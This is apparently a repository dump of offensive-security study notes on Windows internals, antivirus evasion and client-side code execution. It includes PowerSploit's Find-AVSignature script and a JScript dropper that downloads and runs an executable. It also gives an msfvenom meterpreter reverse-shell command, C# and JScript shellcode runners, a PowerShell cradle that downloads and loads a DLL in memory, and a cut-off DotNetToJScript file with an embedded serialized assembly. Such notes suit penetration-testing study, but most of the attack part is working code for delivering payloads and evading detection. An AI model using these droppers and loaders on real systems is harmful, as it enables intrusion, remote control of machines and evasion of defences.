32-bit applications with almost no loss in efficiency. 31 | 32 | To facilitate translation between 32-bit applications and the kernel, WOW64 uses four 64-bit libraries to emulate the execution of 32-bit apps. These are : 33 | 34 | - Ntdll.dll 35 | - Wow64.dll 36 | - Wow64Win.dll 37 | - Wow64Cpu.dll 38 | 39 | On 64-bit Windows, 64-bit native applications and DLLs are stored in **C:\Windows\System32** while the 32-bit versions are stored in **C:\Windows\SysWOW64**. 40 | 41 |   42 | 43 | ## Win32 APIs 44 | 45 | Applications for Windows can be built using various programming languages, but many of those make use of the built-in APIs that Windows provides. 
These interfaces, known as the Win32 API, provide developers with pre-built functionality. 46 | 47 | Example: 48 | 49 | The **GetUserNameA** API, exported by **Advapi32.dll**, retrieves the name of the user executing the function. 50 | 51 | Function Prototype 52 | 53 | BOOL GetUserNameA( 54 | LPSTR lpBuffer, 55 | LPDWORD pcbBuffer 56 | ); 57 | 58 | This API requires two arguments :- 59 | 60 | 1. Output buffer of type LPSTR 61 | 2. Pointer to a DWORD (a 32-bit unsigned integer) holding the size of the buffer in characters; on return it receives the number of characters copied 62 | 63 | The return value is boolean. 64 | 65 | > Suffix "A" indicates the ANSI (8-bit character) version of the API and suffix "W" indicates the Unicode version 66 | 67 | The Unicode version of the same function would be :- 68 | 69 | BOOL GetUserNameW( 70 | LPWSTR lpBuffer, 71 | LPDWORD pcbBuffer 72 | ); 73 | 74 | The first argument is now LPWSTR, a pointer to a wide-character (Unicode) string. 75 | 76 |   77 | 78 | ## Windows Registry 79 | 80 | The registry is effectively a database that consists of a large number of keys with associated values. These keys are organized hierarchically using subkeys. 81 | 82 | > **HKEY_CURRENT_USER (HKCU)** hive : Information related to the current user. \ 83 | > **HKEY_LOCAL_MACHINE (HKLM)** hive : Information related to the operating system. 84 | 85 | Note : Each hive also contains a duplicate section called Wow6432Node which stores the 32-bit settings. 
86 | -------------------------------------------------------------------------------- /.obsidian/workspace: -------------------------------------------------------------------------------- 1 | { 2 | "main": { 3 | "id": "580c51f730ae9f7d", 4 | "type": "split", 5 | "children": [ 6 | { 7 | "id": "105ec597a03fc203", 8 | "type": "leaf", 9 | "state": { 10 | "type": "markdown", 11 | "state": { 12 | "file": "Client-Side-Execution-With-Windows-Script-Host/README.md", 13 | "mode": "source", 14 | "source": false 15 | } 16 | } 17 | } 18 | ], 19 | "direction": "vertical" 20 | }, 21 | "left": { 22 | "id": "97d87bf82fdc3776", 23 | "type": "split", 24 | "children": [ 25 | { 26 | "id": "70d8ef3ca3469d01", 27 | "type": "tabs", 28 | "children": [ 29 | { 30 | "id": "ef4849ca2a3ccf14", 31 | "type": "leaf", 32 | "state": { 33 | "type": "file-explorer", 34 | "state": {} 35 | } 36 | }, 37 | { 38 | "id": "0a7aca5e57051a60", 39 | "type": "leaf", 40 | "state": { 41 | "type": "search", 42 | "state": { 43 | "query": "", 44 | "matchingCase": false, 45 | "explainSearch": false, 46 | "collapseAll": false, 47 | "extraContext": false, 48 | "sortOrder": "alphabetical" 49 | } 50 | } 51 | }, 52 | { 53 | "id": "4d9b2d9291ca8cd4", 54 | "type": "leaf", 55 | "state": { 56 | "type": "starred", 57 | "state": {} 58 | } 59 | } 60 | ] 61 | } 62 | ], 63 | "direction": "horizontal", 64 | "width": 300 65 | }, 66 | "right": { 67 | "id": "dabaab5abe0a3ea3", 68 | "type": "split", 69 | "children": [ 70 | { 71 | "id": "a39ebfa97e1e8971", 72 | "type": "tabs", 73 | "children": [ 74 | { 75 | "id": "d774fb5bd034abff", 76 | "type": "leaf", 77 | "state": { 78 | "type": "backlink", 79 | "state": { 80 | "file": "Client-Side-Execution-With-Windows-Script-Host/README.md", 81 | "collapseAll": false, 82 | "extraContext": false, 83 | "sortOrder": "alphabetical", 84 | "showSearch": false, 85 | "searchQuery": "", 86 | "backlinkCollapsed": false, 87 | "unlinkedCollapsed": true 88 | } 89 | } 90 | }, 91 | { 92 | "id": 
"a2b9ddd1c0938601", 93 | "type": "leaf", 94 | "state": { 95 | "type": "outgoing-link", 96 | "state": { 97 | "file": "Client-Side-Execution-With-Windows-Script-Host/README.md", 98 | "linksCollapsed": false, 99 | "unlinkedCollapsed": true 100 | } 101 | } 102 | }, 103 | { 104 | "id": "191b57f8adb803bd", 105 | "type": "leaf", 106 | "state": { 107 | "type": "tag", 108 | "state": { 109 | "sortOrder": "frequency", 110 | "useHierarchy": true 111 | } 112 | } 113 | }, 114 | { 115 | "id": "66d6162e78370ad7", 116 | "type": "leaf", 117 | "state": { 118 | "type": "outline", 119 | "state": { 120 | "file": "Client-Side-Execution-With-Windows-Script-Host/README.md" 121 | } 122 | } 123 | } 124 | ] 125 | } 126 | ], 127 | "direction": "horizontal", 128 | "width": 300, 129 | "collapsed": true 130 | }, 131 | "active": "ef4849ca2a3ccf14", 132 | "lastOpenFiles": [ 133 | "Client-Side-Code-Execution-With-Office/README.md", 134 | "Antivirus Evasion/README.md" 135 | ] 136 | } -------------------------------------------------------------------------------- /.obsidian/workspace.json: -------------------------------------------------------------------------------- 1 | { 2 | "main": { 3 | "id": "580c51f730ae9f7d", 4 | "type": "split", 5 | "children": [ 6 | { 7 | "id": "056cede136aa8aca", 8 | "type": "tabs", 9 | "children": [ 10 | { 11 | "id": "6469b7a9940c7fb6", 12 | "type": "leaf", 13 | "state": { 14 | "type": "markdown", 15 | "state": { 16 | "file": "Advanced Antivirus Evasion/README.md", 17 | "mode": "source", 18 | "source": false 19 | } 20 | } 21 | } 22 | ] 23 | } 24 | ], 25 | "direction": "vertical" 26 | }, 27 | "left": { 28 | "id": "97d87bf82fdc3776", 29 | "type": "split", 30 | "children": [ 31 | { 32 | "id": "70d8ef3ca3469d01", 33 | "type": "tabs", 34 | "children": [ 35 | { 36 | "id": "ef4849ca2a3ccf14", 37 | "type": "leaf", 38 | "state": { 39 | "type": "file-explorer", 40 | "state": { 41 | "sortOrder": "byCreatedTimeReverse" 42 | } 43 | } 44 | }, 45 | { 46 | "id": "0a7aca5e57051a60", 47 | 
"type": "leaf", 48 | "state": { 49 | "type": "search", 50 | "state": { 51 | "query": "", 52 | "matchingCase": false, 53 | "explainSearch": false, 54 | "collapseAll": false, 55 | "extraContext": false, 56 | "sortOrder": "alphabetical" 57 | } 58 | } 59 | }, 60 | { 61 | "id": "4d9b2d9291ca8cd4", 62 | "type": "leaf", 63 | "state": { 64 | "type": "starred", 65 | "state": {} 66 | } 67 | }, 68 | { 69 | "id": "d033ac271bf2a2d3", 70 | "type": "leaf", 71 | "state": { 72 | "type": "bookmarks", 73 | "state": {} 74 | } 75 | } 76 | ] 77 | } 78 | ], 79 | "direction": "horizontal", 80 | "width": 307.5 81 | }, 82 | "right": { 83 | "id": "dabaab5abe0a3ea3", 84 | "type": "split", 85 | "children": [ 86 | { 87 | "id": "a39ebfa97e1e8971", 88 | "type": "tabs", 89 | "children": [ 90 | { 91 | "id": "d774fb5bd034abff", 92 | "type": "leaf", 93 | "state": { 94 | "type": "backlink", 95 | "state": { 96 | "file": "Advanced Antivirus Evasion/README.md", 97 | "collapseAll": false, 98 | "extraContext": false, 99 | "sortOrder": "alphabetical", 100 | "showSearch": false, 101 | "searchQuery": "", 102 | "backlinkCollapsed": false, 103 | "unlinkedCollapsed": true 104 | } 105 | } 106 | }, 107 | { 108 | "id": "a2b9ddd1c0938601", 109 | "type": "leaf", 110 | "state": { 111 | "type": "outgoing-link", 112 | "state": { 113 | "file": "Advanced Antivirus Evasion/README.md", 114 | "linksCollapsed": false, 115 | "unlinkedCollapsed": true 116 | } 117 | } 118 | }, 119 | { 120 | "id": "191b57f8adb803bd", 121 | "type": "leaf", 122 | "state": { 123 | "type": "tag", 124 | "state": { 125 | "sortOrder": "frequency", 126 | "useHierarchy": true 127 | } 128 | } 129 | }, 130 | { 131 | "id": "66d6162e78370ad7", 132 | "type": "leaf", 133 | "state": { 134 | "type": "outline", 135 | "state": { 136 | "file": "Advanced Antivirus Evasion/README.md" 137 | } 138 | } 139 | }, 140 | { 141 | "id": "4bc051a603902373", 142 | "type": "leaf", 143 | "state": { 144 | "type": "calendar", 145 | "state": {} 146 | } 147 | } 148 | ], 149 | 
"currentTab": 4 150 | } 151 | ], 152 | "direction": "horizontal", 153 | "width": 326.5 154 | }, 155 | "left-ribbon": { 156 | "hiddenItems": { 157 | "switcher:Open quick switcher": false, 158 | "graph:Open graph view": false, 159 | "canvas:Create new canvas": false, 160 | "daily-notes:Open today's daily note": false, 161 | "templates:Insert template": false, 162 | "command-palette:Open command palette": false, 163 | "table-editor-obsidian:Advanced Tables Toolbar": false 164 | } 165 | }, 166 | "active": "6469b7a9940c7fb6", 167 | "lastOpenFiles": [ 168 | "2023-06-01.md", 169 | "Advanced Antivirus Evasion/README.md", 170 | "README.md", 171 | "Process Injection and Migration/README.md", 172 | "Client-Side-Code-Execution-With-Office/README.md", 173 | "Operating-System-and-Programming-Fundamentals/README.md", 174 | "Client-Side-Execution-With-Windows-Script-Host/README.md", 175 | "Antivirus Evasion/README.md" 176 | ] 177 | } -------------------------------------------------------------------------------- /Tools/AV Evasion/Find-AVSignature.ps1: -------------------------------------------------------------------------------- 1 | function Find-AVSignature 2 | { 3 | <# 4 | .SYNOPSIS 5 | 6 | Locate tiny AV signatures. 7 | 8 | PowerSploit Function: Find-AVSignature 9 | Authors: Chris Campbell (@obscuresec) & Matt Graeber (@mattifestation) 10 | License: BSD 3-Clause 11 | Required Dependencies: None 12 | Optional Dependencies: None 13 | 14 | .DESCRIPTION 15 | 16 | Locates single Byte AV signatures utilizing the same method as DSplit from "class101" on heapoverflow.com. 17 | 18 | .PARAMETER Startbyte 19 | 20 | Specifies the first byte to begin splitting on. 21 | 22 | .PARAMETER Endbyte 23 | 24 | Specifies the last byte to split on. 25 | 26 | .PARAMETER Interval 27 | 28 | Specifies the interval size to split with. 29 | 30 | .PARAMETER Path 31 | 32 | Specifies the path to the binary you want tested. 
33 | 34 | .PARAMETER OutPath 35 | 36 | Optionally specifies the directory to write the binaries to. 37 | 38 | .PARAMETER BufferLen 39 | 40 | Specifies the length of the file read buffer . Defaults to 64KB. 41 | 42 | .PARAMETER Force 43 | 44 | Forces the script to continue without confirmation. 45 | 46 | .EXAMPLE 47 | 48 | Find-AVSignature -Startbyte 0 -Endbyte max -Interval 10000 -Path c:\test\exempt\nc.exe 49 | Find-AVSignature -StartByte 10000 -EndByte 20000 -Interval 1000 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run2 -Verbose 50 | Find-AVSignature -StartByte 16000 -EndByte 17000 -Interval 100 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run3 -Verbose 51 | Find-AVSignature -StartByte 16800 -EndByte 16900 -Interval 10 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run4 -Verbose 52 | Find-AVSignature -StartByte 16890 -EndByte 16900 -Interval 1 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run5 -Verbose 53 | 54 | .NOTES 55 | 56 | Several of the versions of "DSplit.exe" available on the internet contain malware. 
57 | 58 | .LINK 59 | 60 | http://obscuresecurity.blogspot.com/2012/12/finding-simple-av-signatures-with.html 61 | https://github.com/mattifestation/PowerSploit 62 | http://www.exploit-monday.com/ 63 | http://heapoverflow.com/f0rums/project.php?issueid=34&filter=changes&page=2 64 | #> 65 | 66 | [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] 67 | [CmdletBinding()] 68 | Param( 69 | [Parameter(Mandatory = $True)] 70 | [ValidateRange(0,4294967295)] 71 | [UInt32] 72 | $StartByte, 73 | 74 | [Parameter(Mandatory = $True)] 75 | [String] 76 | $EndByte, 77 | 78 | [Parameter(Mandatory = $True)] 79 | [ValidateRange(0,4294967295)] 80 | [UInt32] 81 | $Interval, 82 | 83 | [String] 84 | [ValidateScript({Test-Path $_ })] 85 | $Path = ($pwd.path), 86 | 87 | [String] 88 | $OutPath = ($pwd), 89 | 90 | [ValidateRange(1,2097152)] 91 | [UInt32] 92 | $BufferLen = 65536, 93 | 94 | [Switch] $Force 95 | ) 96 | 97 | #test variables 98 | if (!(Test-Path $Path)) {Throw "File path not found"} 99 | $Response = $True 100 | if (!(Test-Path $OutPath)) { 101 | if ($Force -or ($Response = $psCmdlet.ShouldContinue("The `"$OutPath`" does not exist! Do you want to create the directory?",""))){new-item ($OutPath)-type directory} 102 | } 103 | if (!$Response) {Throw "Output path not found"} 104 | if (!(Get-ChildItem $Path).Exists) {Throw "File not found"} 105 | [Int32] $FileSize = (Get-ChildItem $Path).Length 106 | if ($StartByte -gt ($FileSize - 1) -or $StartByte -lt 0) {Throw "StartByte range must be between 0 and $Filesize"} 107 | [Int32] $MaximumByte = (($FileSize) - 1) 108 | if ($EndByte -ceq "max") {$EndByte = $MaximumByte} 109 | 110 | #Recast $Endbyte into an Integer so that it can be compared properly. 111 | [Int32]$EndByte = $EndByte 112 | 113 | #If $Endbyte is greater than the file Length, use $MaximumByte. 114 | if ($EndByte -gt $FileSize) {$EndByte = $MaximumByte} 115 | 116 | #If $Endbyte is less than the $StartByte, use 1 Interval past $StartByte. 
117 | if ($EndByte -lt $StartByte) {$EndByte = $StartByte + $Interval} 118 | 119 | Write-Verbose "StartByte: $StartByte" 120 | Write-Verbose "EndByte: $EndByte" 121 | 122 | #find the filename for the output name 123 | [String] $FileName = (Split-Path $Path -leaf).Split('.')[0] 124 | 125 | #Calculate the number of binaries 126 | [Int32] $ResultNumber = [Math]::Floor(($EndByte - $StartByte) / $Interval) 127 | if (((($EndByte - $StartByte) % $Interval)) -gt 0) {$ResultNumber = ($ResultNumber + 1)} 128 | 129 | #Prompt user to verify parameters to avoid writing binaries to the wrong directory 130 | $Response = $True 131 | if ( $Force -or ( $Response = $psCmdlet.ShouldContinue("This script will result in $ResultNumber binaries being written to `"$OutPath`"!", 132 | "Do you want to continue?"))){} 133 | if (!$Response) {Return} 134 | 135 | Write-Verbose "This script will now write $ResultNumber binaries to `"$OutPath`"." 136 | [Int32] $Number = [Math]::Floor($Endbyte/$Interval) 137 | 138 | #Create a Read Buffer and Stream. 139 | #Note: The Filestream class takes advantage of internal .NET Buffering. We set the default internal buffer to 64KB per http://research.microsoft.com/pubs/64538/tr-2004-136.doc. 
140 | [Byte[]] $ReadBuffer=New-Object byte[] $BufferLen 141 | [System.IO.FileStream] $ReadStream = New-Object System.IO.FileStream($Path, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileShare]::Read, $BufferLen) 142 | 143 | #write out the calculated number of binaries 144 | [Int32] $i = 0 145 | for ($i -eq 0; $i -lt $ResultNumber + 1 ; $i++) 146 | { 147 | # If this is the Final Binary, use $EndBytes, Otherwise calculate based on the Interval 148 | if ($i -eq $ResultNumber) {[Int32]$SplitByte = $EndByte} 149 | else {[Int32] $SplitByte = (($StartByte) + (($Interval) * ($i)))} 150 | 151 | Write-Verbose "Byte 0 -> $($SplitByte)" 152 | 153 | #Reset ReadStream to beginning of file 154 | $ReadStream.Seek(0, [System.IO.SeekOrigin]::Begin) | Out-Null 155 | 156 | #Build a new FileStream for Writing 157 | [String] $outfile = Join-Path $OutPath "$($FileName)_$($SplitByte).bin" 158 | [System.IO.FileStream] $WriteStream = New-Object System.IO.FileStream($outfile, [System.IO.FileMode]::Create, [System.IO.FileAccess]::Write, [System.IO.FileShare]::None, $BufferLen) 159 | 160 | [Int32] $BytesLeft = $SplitByte 161 | Write-Verbose "$($WriteStream.name)" 162 | 163 | #Write Buffer Length to the Writing Stream until the bytes left is smaller than the buffer 164 | while ($BytesLeft -gt $BufferLen){ 165 | [Int32]$count = $ReadStream.Read($ReadBuffer, 0, $BufferLen) 166 | $WriteStream.Write($ReadBuffer, 0, $count) 167 | $BytesLeft = $BytesLeft - $count 168 | } 169 | 170 | #Write the remaining bytes to the file 171 | do { 172 | [Int32]$count = $ReadStream.Read($ReadBuffer, 0, $BytesLeft) 173 | $WriteStream.Write($ReadBuffer, 0, $count) 174 | $BytesLeft = $BytesLeft - $count 175 | } 176 | until ($BytesLeft -eq 0) 177 | $WriteStream.Close() 178 | $WriteStream.Dispose() 179 | } 180 | Write-Verbose "Files written to disk. Flushing memory." 
181 | $ReadStream.Dispose() 182 | 183 | #During testing using large binaries, memory usage was excessive so lets fix that 184 | [System.GC]::Collect() 185 | Write-Verbose "Completed!" 186 | } -------------------------------------------------------------------------------- /Client-Side-Execution-With-Windows-Script-Host/README.md: -------------------------------------------------------------------------------- 1 | # Basic Dropper in JScript 2 | 3 | - To perform an HTTP GET request, we can use the MSXML2.XMLHTTP Object, which is based on Microsoft XML Core Services. 4 | - We would be using the CreateObject method of the Windows Script Host to instantiate the MSXML2.XMLHTTP Object. 5 | 6 | JScript Code : 7 | 8 | var url = "" 9 | var Object = WScript.CreateObject('MSXML2.XMLHTTP'); 10 | Object.Open('GET', url, false); 11 | Object.Send(); 12 | if (Object.Status == 200) 13 | { 14 | var Stream = WScript.CreateObject('ADODB.Stream'); 15 | Stream.Open(); 16 | Stream.Type = 1; 17 | Stream.Write(Object.ResponseBody); 18 | Stream.Position = 0; 19 | Stream.SaveToFile("met.exe", 2); 20 | Stream.Close(); 21 | } 22 | var r = new ActiveXObject("WScript.Shell").Run("met.exe"); 23 | 24 | Explanation : 25 | 26 | 1. We first store the link to the exe file in a variable called url 27 | 2. Next we create the Object of MSXML2.XMLHTTP 28 | 3. We then create a GET request to the link 29 | 4. Next we send the GET request with the Object.Send() command. 30 | 5. If the Object Status is 200, that means it was a success and the file was found. 31 | 6. We then create a Stream to copy the response into it and save it to a file 32 | 7. Using the _ActiveXObject_, we execute a shell command where we execute the exe file. 
33 | 34 |   35 | 36 | > Documentation : 37 | > 38 | > - https://docs.microsoft.com/en-us/previous-versions/windows/desktop/ms767625%28v%3dvs.85%29 39 | > - https://www.w3schools.com/asp/ado_ref_stream.asp 40 | > - https://en.wikipedia.org/wiki/ActiveX 41 | 42 |   43 | 44 | # JScript and C# 45 | 46 | Just as in the previous topics, where we invoked Win32 APIs from C# and integrated them into PowerShell or VBA scripts, we will follow a similar approach here. 47 | 48 | A Simple Hello World Program can be found [here](./C%23%20Programs/HelloWorld.cs) 49 | 50 | Explanation : 51 | 52 | 1. We first import the required libraries in C#. 53 | 2. We then specify the namespace HelloWorld 54 | 3. We then specify the classname followed by the Main function. 55 | 4. Using the Console.WriteLine method, we can print text to the console. 56 | 57 | Compiled exe file can be found [here](./Compiled%20binaries/HelloWorld.exe) 58 | 59 |   60 | 61 | > Namespaces in C# are used to organize large numbers of classes so that the application is easier to manage. In a simple C# program, we use System.Console where System is the namespace and Console is the class. To access a class of a namespace, we need to use namespacename.classname 62 | 63 | > Documentation : 64 | > 65 | > - https://docs.microsoft.com/en-us/dotnet/api/system.console.writeline?view=netframework-4.8 66 | 67 | > Visual Studio > Console (.Net Framework) template > Build > exe file 68 | 69 |   70 | 71 | # DotNetToJScript 72 | 73 | A project created by James Forshaw in 2017 to execute a C# assembly from JScript. 74 | 75 | Github Project : https://github.com/tyranid/DotNetToJScript 76 | 77 | We can download the latest release. The release also includes an example compiled DLL which we can use for testing. 
78 | 79 | The command for converting the DLL to a JS file is : 80 | 81 | ![DotNetToJscript](./images/DotNetToJscript.png) 82 | 83 | Source Code of ExampleAssembly can be found [here](./C%23%20Programs/ExampleAssembly.cs) 84 | Compiled DLL can be found [here](./Compiled%20binaries/ExampleAssembly.dll) 85 | 86 | Explanation : 87 | 88 | 1. The first function sets the version of the .Net framework 89 | 2. The second function is empty as we did not set the -d flag in DotNetToJscript 90 | 3. The next function base64ToStream converts the base64-encoded blob to a data stream. 91 | 4. The serialized_obj variable stores the serialized base64 blob 92 | 5. The entry_class variable stores the name of the class which we want to execute. 93 | 6. We then call the setversion() function and the base64ToStream() function 94 | 7. A BinaryFormatter object is instantiated and its Deserialize method is called to deserialize the serialized blob. 95 | 8. We then execute the relevant methods using the DynamicInvoke and CreateInstance methods. 96 | 9. Finally we execute the constructor with the help of CreateInstance. 97 | 98 |   99 | 100 | # Win32 API calls from C# 101 | 102 | - Here we can import the Win32 API using the P/Invoke import statements. 103 | - Unlike in PowerShell, in C# we can compile the assembly ahead of time before sending it to the victim, so it gets loaded into memory directly. 104 | 105 | Code to execute a simple MessageBox Win32 API can be found [here](./C%23%20Programs/MessageBox.cs) 106 | 107 | Compiled source code in exe format can be found [here](./Compiled%20binaries/MessageBox.exe) 108 | 109 | Explanation : 110 | 111 | 1. First the required libraries are imported. 112 | 2. We then give a name to the namespace and create a class inside that. 113 | 3. The import statement can be found on the https://www.pinvoke.net website. 114 | 4. The Main method calls the Win32 API function which pops a message box. 
115 | 116 |   117 | 118 | # Shellcode runner in C# using Win32 API 119 | 120 | We would be using the same methodology as the previous shellcode runners. First we would allocate memory, copy the shellcode to it and then create a thread to execute it. 121 | 122 | Msfvenom command : 123 | 124 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f csharp EXITFUNC=thread 125 | 126 | ![msfvenom](./images/msfvenom.png) 127 | 128 |   129 | 130 | C# Code can be found [here](./C%23%20Programs/ShellcodeRunner.cs) 131 | 132 | EXE file can be found [here](./Compiled%20binaries/ShellcodeRunner.exe) 133 | 134 | Explanation : 135 | 136 | 1. We first import the namespaces containing important system classes 137 | 2. We then specify the namespace and the classname of this project 138 | 3. Import the Win32 APIs using the P/Invoke statements 139 | 4. Store the shellcode in a variable 140 | 5. Allocate memory using _VirtualAlloc_ by specifying the required size, allocation type and protections. 141 | 6. Copy the shellcode into the newly allocated memory by using the Copy() method. 142 | 7. Execute the memory by using the _CreateThread_ Win32 API 143 | 8. Use the _WaitForSingleObject_ Win32 API to stop the program from quitting immediately and wait for the shell to exit before quitting. 144 | 145 | > In-Depth explanation of the used Win32 APIs can be found [here](./../Client-Side-Code-Execution-With-Office/README.md#in-memory-shellcode-runner-in-vba) 146 | 147 |   148 | 149 | # Jscript Shellcode Runner 150 | 151 | C# code can be found [here](./C%23%20Programs/JscriptShellcode.cs) 152 | 153 | Compiled DLL can be found [here](./Compiled%20binaries/JscriptShellcode.dll) 154 | 155 | Jscript can be found [here](./JScript/JscriptShellcode.js) 156 | 157 | Explanation: 158 | 159 | 1. The procedure is the same as in the C# shellcode runner. 160 | 2. Here we set ComVisible to true. This acts as a whitelist by limiting unnecessary exposure to COM 161 | 3. 
It is important to make it public or else we would not be able to interact with the Component Object Model (COM) 162 | 4. The remaining statements have already been explained in the previous topic. 163 | 164 | DotNetToJscript command : 165 | 166 | ![JscriptShellcode](./images/JscriptShellcode.png) 167 | 168 |   169 | 170 | > Documentation : 171 | > 172 | > - https://docs.microsoft.com/en-us/dotnet/api/system.runtime.interopservices.comvisibleattribute?redirectedfrom=MSDN&view=net-6.0 173 | > - https://stackoverflow.com/questions/15688395/whats-the-deal-with-comvisible-default-and-public-classes-com-exposure 174 | > - https://www.whiteoaksecurity.com/blog/2020-1-23-advanced-ttps-dotnettojscript-part-2/ 175 | 176 |   177 | 178 | # SharpShooter 179 | 180 | - A tool called SharpShooter can be used to generate payloads from C# source code. 181 | - It leverages James Forshaw's DotNetToJScript 182 | - Github : https://github.com/mdsecactivebreach/SharpShooter 183 | - Example command : 184 | 185 | ``` 186 | python SharpShooter.py --payload js --dotnetver 4 --stageless --rawscfile --output 187 | ``` 188 | 189 |   190 | 191 | # Reflective Load of Win32 API for In-Memory Powershell 192 | 193 | The C# source code can be found [here](./C%23%20Programs/ReflectiveLoad.cs) 194 | 195 | The compiled DLL can be found [here](./Compiled%20binaries/ReflectiveLoad.dll) 196 | 197 | Powershell script : 198 | 199 | $data = (New-Object System.Net.WebClient).DownloadData('') 200 | $assem = [System.Reflection.Assembly]::Load($data) 201 | $class = $assem.GetType(".") 202 | $method = $class.GetMethod("") 203 | $method.Invoke(0, $null) 204 | 205 |   206 | 207 | Explanation : 208 | 209 | 1. We first download the bytes of the hosted DLL and store them in a variable 210 | 2. We load the assembly in memory using the Load() method from System.Reflection.Assembly 211 | 3. We interact with the loaded DLL using the GetType and GetMethod functions. 212 | 4. 
We then invoke the method hence executing the code in memory. 213 | 214 |   215 | 216 | > Documentation : 217 | > 218 | > - https://docs.microsoft.com/en-us/dotnet/api/system.reflection.assembly.load?view=netframework-4.8 219 | > - https://docs.microsoft.com/en-us/dotnet/api/system.net.webclient.downloaddata?view=netframework-4.8 220 | -------------------------------------------------------------------------------- /Client-Side-Execution-With-Windows-Script-Host/JScript/ExampleAssembly.js: -------------------------------------------------------------------------------- 1 | function setversion() { 2 | new ActiveXObject('WScript.Shell').Environment('Process')('COMPLUS_Version') = 'v4.0.30319'; 3 | } 4 | function debug(s) {} 5 | function base64ToStream(b) { 6 | var enc = new ActiveXObject("System.Text.ASCIIEncoding"); 7 | var length = enc.GetByteCount_2(b); 8 | var ba = enc.GetBytes_4(b); 9 | var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform"); 10 | ba = transform.TransformFinalBlock(ba, 0, length); 11 | var ms = new ActiveXObject("System.IO.MemoryStream"); 12 | ms.Write(ba, 0, (length / 4) * 3); 13 | ms.Position = 0; 14 | return ms; 15 | } 16 | 17 | var serialized_obj = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"+ 18 | "AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"+ 19 | "dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"+ 20 | "ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"+ 21 | "AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl"+ 22 | "RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU"+ 23 | "eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl"+ 24 | "cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90"+ 25 | "aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu"+ 26 | 
"MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH"+ 27 | "dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA"+ 28 | "ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw"+ 29 | "B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu"+ 30 | "dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA"+ 31 | "CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u"+ 32 | "SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5"+ 33 | "cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR"+ 34 | "AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA"+ 35 | "AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y"+ 36 | "bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh"+ 37 | "NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz"+ 38 | "ZW1ibHkGFwAAAARMb2FkCg8MAAAAABQAAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA"+ 39 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy"+ 40 | "YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAeZx0WgAAAAAA"+ 41 | "AAAA4AAiIAsBMAAACgAAAAgAAAAAAAAWKAAAACAAAABAAAAAAAAQACAAAAACAAAEAAAAAAAAAAQA"+ 42 | "AAAAAAAAAIAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAxCcA"+ 43 | "AE8AAAAAQAAADAQAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAIwmAAAcAAAAAAAAAAAAAAAAAAAA"+ 44 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA"+ 45 | 